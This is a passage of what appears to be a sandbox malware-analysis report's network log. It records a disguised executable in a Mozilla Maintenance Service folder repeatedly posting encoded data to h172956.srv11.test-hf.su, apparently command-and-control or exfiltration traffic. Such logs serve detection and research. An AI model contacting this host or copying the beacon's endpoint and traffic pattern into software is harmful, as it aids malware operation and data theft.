                                                                    Mar 5, 2024 22:28:31.107331991 CET2596OUTData Raw: 54 5b 51 5a 5e 59 55 52 5e 57 5a 51 57 58 50 53 54 51 54 5d 56 54 57 5a 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T[QZ^YUR^WZQWXPSTQT]VTWZT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9C/1"R3:'5=8/0;3\%6< #<#]'%Z>-)%Z"!Q*-
                                                                    Mar 5, 2024 22:28:31.343434095 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    63192.168.2.54978591.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:30.944545984 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1920
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:31.154288054 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:31.154508114 CET1920OUTData Raw: 54 5c 51 5d 5b 5f 55 51 5e 57 5a 51 57 5e 50 5d 54 52 54 5f 56 5a 57 58 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T\Q][_UQ^WZQW^P]TRT_VZWXT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:/22V$%&%:\8"^'&*;#/<"<$?Y1,9;%Z"!Q*
                                                                    Mar 5, 2024 22:28:31.390526056 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    64192.168.2.54978691.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:31.676419020 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:28:31.888190031 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:31.888463020 CET2596OUTData Raw: 54 5e 51 5e 5e 5b 55 5c 5e 57 5a 51 57 58 50 59 54 56 54 58 56 5b 57 59 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T^Q^^[U\^WZQWXPYTVTXV[WYT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9A.1-$U"&55/?X3<&9<54#/<$#Y%:;%Z"!Q*-
                                                                    Mar 5, 2024 22:28:32.127346992 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    65192.168.2.54978791.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:32.528229952 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:32.739315987 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:32.739512920 CET2596OUTData Raw: 51 59 51 5c 5e 5c 55 53 5e 57 5a 51 57 58 50 5e 54 54 54 58 56 5b 57 54 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: QYQ\^\US^WZQWXP^TTTXV[WTT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]98')]'6*];)08(1;56//]0$$?>;%Z"!Q*-
                                                                    Mar 5, 2024 22:28:32.980446100 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    66192.168.2.54978891.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:34.385080099 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:28:34.595057011 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:34.595295906 CET2596OUTData Raw: 54 5c 54 59 5b 5b 50 56 5e 57 5a 51 57 51 50 5f 54 55 54 52 56 54 57 59 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T\TY[[PV^WZQWQP_TUTRVTWYT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:89'>':;*Y08[&90"? V5+3#^1,]-9%Z"!Q*
                                                                    Mar 5, 2024 22:28:34.831151009 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:34 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    67192.168.2.54978991.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:35.157700062 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2592
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:35.370455980 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:35.370646954 CET2592OUTData Raw: 54 5d 54 50 5b 5b 50 50 5e 57 5a 51 57 59 50 59 54 52 54 5a 56 58 57 59 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T]TP[[PP^WZQWYPYTRTZVXWYT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9B,-%3%_3%985'(<1_?55? '$2.8%Z"!Q*!
                                                                    Mar 5, 2024 22:28:35.608429909 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    68192.168.2.54979091.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:35.946909904 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:36.156626940 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:36.157013893 CET2596OUTData Raw: 51 5c 51 5e 5b 5c 55 52 5e 57 5a 51 57 5c 50 5b 54 50 54 5c 56 54 57 58 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q\Q^[\UR^WZQW\P[TPT\VTWXT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9A835[&%6;?"Y3]&/!?'6<7_'B;\1<=-)%Z"!Q*=
                                                                    Mar 5, 2024 22:28:36.390614986 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:36 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    69192.168.2.54979191.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:36.569272041 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1920
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:36.782855988 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:36.783227921 CET1920OUTData Raw: 54 5a 51 5d 5b 5f 50 57 5e 57 5a 51 57 50 50 5a 54 54 54 5c 56 5b 57 5c 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TZQ][_PW^WZQWPPZTTT\V[W\T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9D."10#1]'P&],5$;\2*$U5<Q#<,3&?",%Z"!Q*
                                                                    Mar 5, 2024 22:28:37.022408962 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:36 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    70192.168.2.54979291.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:36.696899891 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2592
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:36.911490917 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:36.911720037 CET2592OUTData Raw: 54 5c 54 50 5b 5e 55 57 5e 57 5a 51 57 59 50 58 54 56 54 53 56 5d 57 5d 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T\TP[^UW^WZQWYPXTVTSV]W]T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9A,"-%3136:\8/' 2;#,V!, $4<%<2\,%Z"!Q*%
                                                                    Mar 5, 2024 22:28:37.150871038 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    71192.168.2.54979391.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:37.491072893 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:28:37.702842951 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:37.703104973 CET2596OUTData Raw: 54 5e 51 5b 5b 57 55 50 5e 57 5a 51 57 58 50 5a 54 57 54 58 56 5d 57 5c 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T^Q[[WUP^WZQWXPZTWTXV]W\T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9B8!%363"\;6&(&(V5Z<P!0;X2?%/)%Z"!Q*-
                                                                    Mar 5, 2024 22:28:37.941956997 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    72192.168.2.54979491.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:38.270896912 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:38.481709003 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:38.481950998 CET2596OUTData Raw: 54 50 54 59 5e 5d 55 57 5e 57 5a 51 57 51 50 52 54 56 54 59 56 5c 57 54 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TPTY^]UW^WZQWQPRTVTYV\WTT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9A/253'69810^$2*3!(W",\0'#]1/!;%Z"!Q*
                                                                    Mar 5, 2024 22:28:38.715204000 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    73192.168.2.54979591.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:39.052227974 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:39.261208057 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:39.262015104 CET2596OUTData Raw: 54 5a 51 5a 5e 5e 55 51 5e 57 5a 51 57 5b 50 5e 54 51 54 58 56 5d 57 55 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TZQZ^^UQ^WZQW[P^TQTXV]WUT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:/1'0=[$);<1' 10W!#6<7X3$?Y2<=,9%Z"!Q*!
                                                                    Mar 5, 2024 22:28:39.497524023 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    74192.168.2.54979691.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:39.831615925 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:40.043018103 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:40.043349981 CET2596OUTData Raw: 54 51 54 5c 5e 5e 55 54 5e 57 5a 51 57 5f 50 5c 54 54 54 5c 56 5e 57 54 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TQT\^^UT^WZQW_P\TTT\V^WTT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:/$#9]'&,Y*_3/X1,T6?4Q6<,0<&/&-9%Z"!Q*1
                                                                    Mar 5, 2024 22:28:40.279078960 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    75192.168.2.54979791.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:40.613246918 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:40.822846889 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:40.823086023 CET2596OUTData Raw: 51 5a 54 5e 5b 5d 55 54 5e 57 5a 51 57 5e 50 5b 54 57 54 5e 56 59 57 5f 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
